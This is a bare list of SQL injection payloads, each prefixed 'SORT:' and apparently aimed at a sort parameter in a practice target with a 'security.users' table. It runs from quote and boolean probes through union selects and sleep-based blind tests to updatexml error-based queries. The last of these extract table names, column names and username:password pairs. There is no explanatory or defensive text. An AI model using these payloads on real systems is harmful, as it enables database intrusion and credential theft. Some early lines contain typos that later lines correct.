SORT:1
SORT:2
SORT:'
SORT:'-- 
SORT:1'
SORT:1
SORT:1\
SORT:1'
SORT:1"
SORT:1''
SORT:1'or'1
SORT:1'union select 1,2,database()
SORT:1 and union select 1,2,database()
SORT:1 and updataxml(1,concat(0x7e,select database(),0x7e),1)
SORT:1 and updataxml(1,concat(0x7e,(select database()),0x7e),1)
SORT:1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)
SORT:1 and 1=1
SORT:1 and 1=2
SORT:-1 or 1=2
SORT:-1
SORT:1 and 1=2
SORT:1' and 1=2'
SORT:1' and '1=2
SORT:1 and '1=2
SORT:1 and 1=2
SORT:11 and 1=2
SORT:1=2 and 1=2
SORT:1=2
SORT:1 union select 1,database()
SORT:1 ;union select 1,database()
SORT:1 'union select 1,database()
SORT:1 union select 1,database()
SORT:1 and if(length(database())>5,sleep(10),1)
SORT:1 and if(length(database())>5,sleep(10),1)
SORT:1 and if(length(database())>5,sleep(1),1)
SORT:1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)
SORT:1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)
SORT:1 and updatexml(1,concat(0x7e,(select group_concat(username,":",password) from security.users),0x7e),1)
